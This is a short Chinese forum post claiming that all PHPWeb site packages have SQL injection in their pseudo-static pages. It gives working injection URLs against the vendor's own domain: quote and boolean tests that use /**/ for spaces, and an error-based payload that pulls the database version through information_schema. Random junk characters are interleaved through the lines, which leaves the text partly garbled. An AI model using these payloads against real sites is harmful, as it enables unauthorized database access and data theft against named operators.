phpweb所有的整站程序伪静态页面都存在sql注入4 Y4 s: _/ V8 M( n$ Z$ E! j
2 M$ N& X- x+ w0 G4 l7 y主站:http://phpweb.net/
8 O; B$ I" t' H$ r: B% H, K- V加’检测:
/ S1 r2 @' `; u" m- Z* K7 q
4 M" q* A; A0 ~5 L# M. Shttp://www.phpweb.net/down/html/?772′.html# z; `' y6 Z' U; P: n
3 k7 b& l8 X+ j2 {! D* H' b
出错
7 v4 r; G/ ^2 I4 w# P0 E/ j: I" R存在注入。7 x0 p! F+ ^/ {$ l8 \! W
不能用空格,只能用/*罗
6 F& w- `4 e% M$ s2 n/ xhttp://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
9 _/ ?; ~: n7 q5 I4 B/ A" z8 [8 R 3 M# ~2 R0 |( i; ^1 C
http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
4 T* y i6 ?! J* e爆数据库版本:
- G. N! G# F% S- z/ X: J" ~+ x & q6 h& x$ {) ~! Y3 X
?
n: d$ ~9 K v+ w0 I, s( d' ~11 u: y& y# }3 x" F) {9 n- i5 n6 v
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html: q6 j$ G4 k, Z L, ~
更新日期: 2013-01-03 13:39:50
9 U: n( p' y( T |
发表于 2013-1-4 19:46:42
收藏
支持
反对